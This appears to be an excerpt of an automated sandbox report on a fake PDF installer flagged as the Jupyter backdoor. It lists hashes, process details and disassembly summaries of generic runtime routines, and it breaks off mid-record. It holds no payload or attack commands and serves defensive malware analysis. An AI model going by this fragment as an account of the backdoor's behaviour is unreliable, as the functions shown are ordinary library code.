                                                                                                    Imagebase:0x7ff7bedd0000
                                                                                                    File size:447488 bytes
                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Jupyter, Description: Yara detected Jupyter backdoor, Source: 00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Jupyter, Description: Yara detected Jupyter backdoor, Source: 00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    Reputation:high

                                                                                                    Chronological Activities

                                                                                                    Analysis Process: conhost.exe PID: 6244 Parent PID: 6916

                                                                                                    General

                                                                                                    Start time:21:29:04
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff724c50000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Chronological Activities

                                                                                                    Disassembly

                                                                                                    Code Analysis

                                                                                                    Reset < >

                                                                                                      Analysis Process: PDFsamEnhanced7Installer.exe PID: 616 Parent PID: 6656 PDFsamEnhanced7Installer.exeCOMMON

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:5.4%
                                                                                                      Total number of Nodes:184
                                                                                                      Total number of Limit Nodes:13

                                                                                                      Graph

                                                                                                      execution_graph 2307 18d584d 2310 17ebd84 2307->2310 2309 18d5860 2311 17ebd8f IsProcessorFeaturePresent 2310->2311 2312 17ebd8d 2310->2312 2314 17ebdd1 2311->2314 2312->2309 2317 17ebd95 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2314->2317 2316 17ebeb4 2316->2309 2317->2316 2191 187b8e3 2192 187b8ef 2191->2192 2193 187b8f6 GetLastError ExitThread 2192->2193 2194 187b903 2192->2194 2201 1894b3c 2194->2201 2197 187b91f 2206 187bac2 2197->2206 2202 187b913 2201->2202 2203 1894b4e GetPEB 2201->2203 2202->2197 2209 189640b 2202->2209 2203->2202 2204 1894b61 2203->2204 2212 1895ee4 2204->2212 2219 187b998 2206->2219 2208 187bacf 2210 1895de1 GetProcAddress 2209->2210 2211 1896427 2210->2211 2211->2197 2215 1895de1 2212->2215 2214 1895f00 2214->2202 2216 1895e0f 2215->2216 2218 1895e0b 2215->2218 2217 1895e29 GetProcAddress 2216->2217 2216->2218 2217->2218 2218->2214 2221 187b9a3 2219->2221 2220 187b9e5 ExitThread 2221->2220 2223 187b9bc 2221->2223 2227 1896446 2221->2227 2224 187b9cf 2223->2224 2225 187b9c8 CloseHandle 2223->2225 2224->2220 2226 187b9db FreeLibraryAndExitThread 2224->2226 2225->2224 2226->2220 2228 1895de1 GetProcAddress 2227->2228 2229 189645f 2228->2229 2229->2223 2403 17ec896 2406 17ed8b5 2403->2406 2405 17ec89b 2405->2405 2407 17ed8cb 2406->2407 2409 17ed8d4 2407->2409 2410 17ed868 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2407->2410 2409->2405 2410->2409 2416 1871f6d 2417 1871f7f 2416->2417 2419 1871f8d 2416->2419 2418 17ebd84 _ValidateLocalCookies 5 API calls 2417->2418 2418->2419 2240 17da691 2241 17da64e 2240->2241 2241->2240 2243 17db3ef 2241->2243 2269 17db150 2243->2269 2245 17db3ff 2246 17db45c 2245->2246 2258 17db480 2245->2258 2278 17db38d 2246->2278 2249 17db655 2249->2241 2250 17db4f8 LoadLibraryExA 2251 17db559 2250->2251 2252 17db50b GetLastError 2250->2252 2253 17db564 FreeLibrary 2251->2253 2256 17db56b 2251->2256 2254 17db51e 2252->2254 2255 17db534 2252->2255 2253->2256 2254->2251 2254->2255 2260 17db38d DloadReleaseSectionWriteAccess 6 API calls 2255->2260 2257 17db5c9 GetProcAddress 2256->2257 2264 17db627 2256->2264 2259 17db5d9 GetLastError 2257->2259 2257->2264 2258->2250 2258->2251 2258->2256 2258->2264 2267 17db5ec 2259->2267 2262 17db53f RaiseException 2260->2262 2261 17db38d DloadReleaseSectionWriteAccess 6 API calls 2261->2249 2262->2249 2263 17db38d DloadReleaseSectionWriteAccess 6 API calls 2265 17db60d RaiseException 2263->2265 2264->2261 2266 17db150 ___delayLoadHelper2@8 6 API calls 2265->2266 2268 17db624 2266->2268 2267->2263 2267->2264 2268->2264 2270 17db15c 2269->2270 2271 17db182 2269->2271 2286 17db1f6 2270->2286 2271->2245 2274 17db17d 2294 17db183 2274->2294 2279 17db39f 2278->2279 2280 17db3c1 RaiseException 2278->2280 2281 17db1f6 DloadReleaseSectionWriteAccess 3 API calls 2279->2281 2280->2249 2282 17db3a4 2281->2282 2283 17db3bc 2282->2283 2285 17db31f DloadProtectSection 3 API calls 2282->2285 2304 17db3c3 2283->2304 2285->2283 2287 17db183 DloadGetSRWLockFunctionPointers 3 API calls 2286->2287 2288 17db161 2287->2288 2288->2274 2289 17db31f 2288->2289 2292 17db334 DloadObtainSection 2289->2292 2290 17db33a 2290->2274 2291 17db36f VirtualProtect 2291->2290 2292->2290 2292->2291 2300 17db235 VirtualQuery 2292->2300 2295 17db1a6 2294->2295 2296 17db191 2294->2296 2295->2245 2296->2295 2297 17db195 GetModuleHandleW 2296->2297 2297->2295 2298 17db1aa GetProcAddress 2297->2298 2298->2295 2299 17db1ba GetProcAddress 2298->2299 2299->2295 2301 17db250 2300->2301 2302 17db25b GetSystemInfo 2301->2302 2303 17db292 2301->2303 2302->2303 2303->2291 2303->2303 2305 17db183 DloadGetSRWLockFunctionPointers 3 API calls 2304->2305 2306 17db3c8 2305->2306 2306->2280 2425 10d4220 WaitForSingleObject CloseHandle 2426 10d4251 2425->2426 2427 18bf0a5 2428 17ebd84 _ValidateLocalCookies 5 API calls 2427->2428 2429 18bf0b8 2428->2429 2430 17ebd84 _ValidateLocalCookies 5 API calls 2429->2430 2431 18bf0c2 2430->2431 2328 1899646 2329 1899652 2328->2329 2336 1893943 EnterCriticalSection 2329->2336 2331 189965d 2337 1898e7b 2331->2337 2336->2331 2356 1898df7 2337->2356 2339 1898e93 2340 189908a 2339->2340 2341 1898e9c 2339->2341 2368 187c04b IsProcessorFeaturePresent 2340->2368 2343 1898fc1 2341->2343 2345 1898ecc 2341->2345 2346 1898fc6 2341->2346 2353 1899691 2343->2353 2344 1899094 2361 1899095 2345->2361 2347 1899095 3 API calls 2346->2347 2348 1898fec 2347->2348 2349 1899095 3 API calls 2348->2349 2349->2343 2352 1899095 3 API calls 2352->2343 2386 189398b LeaveCriticalSection 2353->2386 2355 189967c 2357 1898e18 2356->2357 2358 1898e03 _free 2356->2358 2357->2339 2371 187c01e 2358->2371 2362 18990ac 2361->2362 2365 1898f48 2362->2365 2381 1898e23 2362->2381 2364 1899182 2364->2365 2366 187c04b 3 API calls 2364->2366 2365->2352 2367 18991d4 2366->2367 2369 187c057 2368->2369 2370 187c06c GetCurrentProcess TerminateProcess 2369->2370 2370->2344 2374 187bfba 2371->2374 2373 187c02a 2373->2339 2375 187bfc5 2374->2375 2376 187c04b 3 API calls 2375->2376 2377 187bfd3 2375->2377 2378 187c01d 2376->2378 2377->2373 2379 187bfba 3 API calls 2378->2379 2380 187c02a 2379->2380 2380->2373 2382 1898e2f _free 2381->2382 2383 1898e44 2381->2383 2384 187c01e 3 API calls 2382->2384 2383->2364 2385 1898e3f 2384->2385 2385->2364 2386->2355 2435 18bed24 2436 17ebd84 _ValidateLocalCookies 5 API calls 2435->2436 2437 18bed37 2436->2437 2179 17f0e4f 2180 17f0e6a 2179->2180 2181 17f0e59 2179->2181 2181->2180 2183 187b174 2181->2183 2186 189595f 2183->2186 2185 187b18c 2185->2180 2187 189596a RtlFreeHeap 2186->2187 2188 1895993 _free 2186->2188 2187->2188 2189 189597f _free 2187->2189 2188->2185 2190 1895985 GetLastError 2189->2190 2190->2188 2451 1868a70 2452 1868a8e 2451->2452 2463 1868a30 2452->2463 2464 1868a42 2463->2464 2465 1868a4f 2463->2465 2466 17ebd84 _ValidateLocalCookies 5 API calls 2464->2466 2466->2465 2230 10af7d0 2231 10af7ea 2230->2231 2232 10af7f2 2230->2232 2233 10af802 2231->2233 2237 1869f8d 2231->2237 2235 1869f8d KiUserExceptionDispatcher 2233->2235 2236 10af847 2235->2236 2238 1869fa7 2237->2238 2239 1869fd4 KiUserExceptionDispatcher 2237->2239 2238->2239 2239->2233

                                                                                                      Executed Functions

                                                                                                      Function 018993B0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 152 18993b0-18993d8 call 1898df1 call 1898e4f 157 18993de-18993ea call 1898df7 152->157 158 1899500-189955c call 187c04b call 187b8cd 152->158 157->158 164 18993f0-18993fc call 1898e23 157->164 170 189955e-1899564 158->170 171 1899566-1899569 158->171 164->158 169 1899402-1899423 call 189595f GetTimeZoneInformation 164->169 180 1899429-189944a 169->180 181 18994de-18994ff call 1898deb call 1898ddf call 1898de5 169->181 173 18995ac-18995be 170->173 172 189956b-189957b call 1895999 171->172 171->173 184 189957d 172->184 185 1899585-189959e call 187b8cd 172->185 177 18995ce call 18993b0 173->177 178 18995c0-18995c3 173->178 190 18995d3-18995e8 call 189595f call 17ebd84 177->190 178->177 182 18995c5-18995cc call 18991d5 178->182 186 189944c-1899451 180->186 187 1899454-189945b 180->187 182->190 191 189957e-1899583 call 189595f 184->191 207 18995a0-18995a1 185->207 208 18995a3-18995a9 call 189595f 185->208 186->187 192 189946d-189946f 187->192 193 189945d-1899464 187->193 210 18995ab 191->210 199 1899471-189949a call 18939dd call 1895a63 192->199 193->192 200 1899466-189946b 193->200 219 18994a8-18994aa 199->219 220 189949c-189949f 199->220 200->199 207->191 208->210 210->173 222 18994ac-18994ca call 1895a63 219->222 220->219 221 18994a1-18994a6 220->221 221->222 225 18994d9-18994dc 222->225 226 18994cc-18994cf 222->226 225->181 226->225 227 18994d1-18994d7 226->227 227->181
                                                                                                      APIs
                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01A2DE04), ref: 0189941A
                                                                                                      • _free.LIBCMT ref: 01899408
                                                                                                        • Part of subcall function 0189595F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 01895975
                                                                                                        • Part of subcall function 0189595F: GetLastError.KERNEL32(?), ref: 01895987
                                                                                                      • _free.LIBCMT ref: 018995D4
                                                                                                      Strings
                                                                                                      • W. Europe Standard Time, xrefs: 01899489
                                                                                                      • W. Europe Daylight Time, xrefs: 018994B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                      • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                      • API String ID: 2155170405-986674615
                                                                                                      • Opcode ID: 9c87f68a377757f966f7946c9ef48c7120683b87119ad54f95072d344421731b
                                                                                                      • Instruction ID: f58d447c13dce5f12e4f15882c24dd46db4b5566d3cbb49a599122414ad7ecf3
                                                                                                      • Opcode Fuzzy Hash: 9c87f68a377757f966f7946c9ef48c7120683b87119ad54f95072d344421731b
                                                                                                      • Instruction Fuzzy Hash: 34510671D0020AABDF21EF6DDC819AE7BBCAF51324B1801AEE551E7591E7309B41CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 018991D5, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 18991d5-18991fd call 1898df1 call 1898e4f 5 18993a3-18993d8 call 187c04b call 1898df1 call 1898e4f 0->5 6 1899203-189920f call 1898df7 0->6 31 18993de-18993ea call 1898df7 5->31 32 1899500-189955c call 187c04b call 187b8cd 5->32 6->5 12 1899215-1899220 6->12 13 1899222-1899224 12->13 14 1899256-189925f call 189595f 12->14 16 1899226-189922a 13->16 27 1899262-1899267 14->27 19 189922c-189922e 16->19 20 1899246-1899248 16->20 23 1899230-1899236 19->23 24 1899242-1899244 19->24 25 189924b-189924d 20->25 23->20 28 1899238-1899240 23->28 24->25 29 189939f-18993a2 25->29 30 1899253 25->30 27->27 33 1899269-189928a call 1895999 call 189595f 27->33 28->16 28->24 30->14 31->32 42 18993f0-18993fc call 1898e23 31->42 50 189955e-1899564 32->50 51 1899566-1899569 32->51 33->29 48 1899290-1899293 33->48 42->32 49 1899402-1899423 call 189595f GetTimeZoneInformation 42->49 52 1899296-189929b 48->52 63 1899429-189944a 49->63 64 18994de-18994ff call 1898deb call 1898ddf call 1898de5 49->64 54 18995ac-18995be 50->54 53 189956b-189957b call 1895999 51->53 51->54 52->52 56 189929d-18992af call 188bbd0 52->56 68 189957d 53->68 69 1899585-189959e call 187b8cd 53->69 59 18995ce call 18993b0 54->59 60 18995c0-18995c3 54->60 56->5 74 18992b5-18992c8 call 188bcdd 56->74 75 18995d3-18995e8 call 189595f call 17ebd84 59->75 60->59 65 18995c5-18995cc call 18991d5 60->65 70 189944c-1899451 63->70 71 1899454-189945b 63->71 65->75 76 189957e-1899583 call 189595f 68->76 95 18995a0-18995a1 69->95 96 18995a3-18995a9 call 189595f 69->96 70->71 77 189946d-189946f 71->77 78 189945d-1899464 71->78 74->5 93 18992ce-18992d1 74->93 98 18995ab 76->98 85 1899471-189949a call 18939dd call 1895a63 77->85 78->77 86 1899466-189946b 78->86 113 18994a8-18994aa 85->113 114 189949c-189949f 85->114 86->85 100 18992d9-18992df 93->100 101 18992d3-18992d7 93->101 95->76 96->98 98->54 106 18992e1 100->106 107 18992e2-18992ef call 187b1b2 100->107 101->93 101->100 106->107 116 18992f2-18992f7 107->116 117 18994ac-18994ca call 1895a63 113->117 114->113 115 18994a1-18994a6 114->115 115->117 118 18992f9-18992fe 116->118 119 1899300-1899301 116->119 123 18994d9-18994dc 117->123 124 18994cc-18994cf 117->124 118->119 121 1899303-1899306 118->121 119->116 125 1899308-189931f call 187b1b2 121->125 126 1899354-1899357 121->126 123->64 124->123 129 18994d1-18994d7 124->129 135 1899321 125->135 136 1899333-1899335 125->136 127 1899359-189935b 126->127 128 189935e-1899372 126->128 127->128 131 1899388 128->131 132 1899374-1899384 call 188bcdd 128->132 129->64 137 189938b-189939d call 1898deb call 1898ddf 131->137 132->5 142 1899386 132->142 139 1899323-1899328 135->139 136->126 141 1899337-1899347 call 187b1b2 136->141 137->29 139->136 143 189932a-1899331 139->143 149 189934e-1899352 141->149 142->137 143->136 143->139 149->126 150 1899349-189934b 149->150 150->126 151 189934d 150->151 151->149
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • W. Europe Standard Time, xrefs: 01899489
                                                                                                      • W. Europe Daylight Time, xrefs: 018994B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$InformationTimeZone
                                                                                                      • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                      • API String ID: 597776487-986674615
                                                                                                      • Opcode ID: a506fc88ec80485f4a30903325746d2d495efb881fd2b170da8762b11ec6d987
                                                                                                      • Instruction ID: 1cc98f62d3b9367e73485dbfbfe1f234143797c37f539db47ae8bc056371fe18
                                                                                                      • Opcode Fuzzy Hash: a506fc88ec80485f4a30903325746d2d495efb881fd2b170da8762b11ec6d987
                                                                                                      • Instruction Fuzzy Hash: 5DC14971D0420A9BDF269F7CDC806AA7BBDAF56328F1C509EE495D7282E7308B41C791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0189950B, Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 228 189950b-189955c call 187b8cd 231 189955e-1899564 228->231 232 1899566-1899569 228->232 234 18995ac-18995be 231->234 233 189956b-189957b call 1895999 232->233 232->234 241 189957d 233->241 242 1899585-189959e call 187b8cd 233->242 236 18995ce call 18993b0 234->236 237 18995c0-18995c3 234->237 244 18995d3-18995e8 call 189595f call 17ebd84 236->244 237->236 239 18995c5-18995cc call 18991d5 237->239 239->244 245 189957e-1899583 call 189595f 241->245 253 18995a0-18995a1 242->253 254 18995a3-18995a9 call 189595f 242->254 256 18995ab 245->256 253->245 254->256 256->234
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 0189957E
                                                                                                      • _free.LIBCMT ref: 018995D4
                                                                                                        • Part of subcall function 018993B0: _free.LIBCMT ref: 01899408
                                                                                                        • Part of subcall function 018993B0: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01A2DE04), ref: 0189941A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$InformationTimeZone
                                                                                                      • String ID:
                                                                                                      • API String ID: 597776487-0
                                                                                                      • Opcode ID: 4788085f9b4f6d05814f74d6332b8ae5c55c4b8ef4e5129b3540ca9e66085e9f
                                                                                                      • Instruction ID: e941ba9fcfdfc3ff833d8407bf6369d3f2b0a6c6b7c4f60e14e4dc38588b8e47
                                                                                                      • Opcode Fuzzy Hash: 4788085f9b4f6d05814f74d6332b8ae5c55c4b8ef4e5129b3540ca9e66085e9f
                                                                                                      • Instruction Fuzzy Hash: 72210EB1C0021A5BDF31A62D9C44AEB77BC9F91378F18029AF895E3180DB705F858A91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0187B998, Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 260 187b998-187b9a5 call 189580a 263 187b9a7-187b9af 260->263 264 187b9e5-187b9e8 ExitThread 260->264 263->264 265 187b9b1-187b9b5 263->265 266 187b9b7 call 1896446 265->266 267 187b9bc-187b9c2 265->267 266->267 269 187b9c4-187b9c6 267->269 270 187b9cf-187b9d5 267->270 269->270 271 187b9c8-187b9c9 CloseHandle 269->271 270->264 272 187b9d7-187b9d9 270->272 271->270 272->264 273 187b9db-187b9df FreeLibraryAndExitThread 272->273 273->264
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNEL32(?,?,?,0187BACF,?,?,0187B941,00000000), ref: 0187B9C9
                                                                                                      • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0187BACF,?,?,0187B941,00000000), ref: 0187B9DF
                                                                                                      • ExitThread.KERNEL32 ref: 0187B9E8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitThread$CloseFreeHandleLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 2705336791-0
                                                                                                      • Opcode ID: bf4c853077cb99e858229dc6f308c4e059c192233c0710d51fb18a5ea4896fd2
                                                                                                      • Instruction ID: b6f8632919df19c0f3a508358a45f65b3738a8a5f3764b7dafc52af793173019
                                                                                                      • Opcode Fuzzy Hash: bf4c853077cb99e858229dc6f308c4e059c192233c0710d51fb18a5ea4896fd2
                                                                                                      • Instruction Fuzzy Hash: FCF08C314007007BEB315E7DCA4DB6A7EAAAF02320B184610FA75C70A0FB30DA51C791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01869F8D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 274 1869f8d-1869fa5 275 1869fa7-1869faa 274->275 276 1869fd4-1869ff6 KiUserExceptionDispatcher 274->276 277 1869fac-1869fc8 275->277 278 1869fca-1869fcd 275->278 277->276 277->278 278->276 279 1869fcf 278->279 279->276
                                                                                                      APIs
                                                                                                      • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,010AF847,00000000,00000014,?,010AF847,?,01B23E54,?,?,00000004,00000000,00000000,59481BE9), ref: 01869FED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
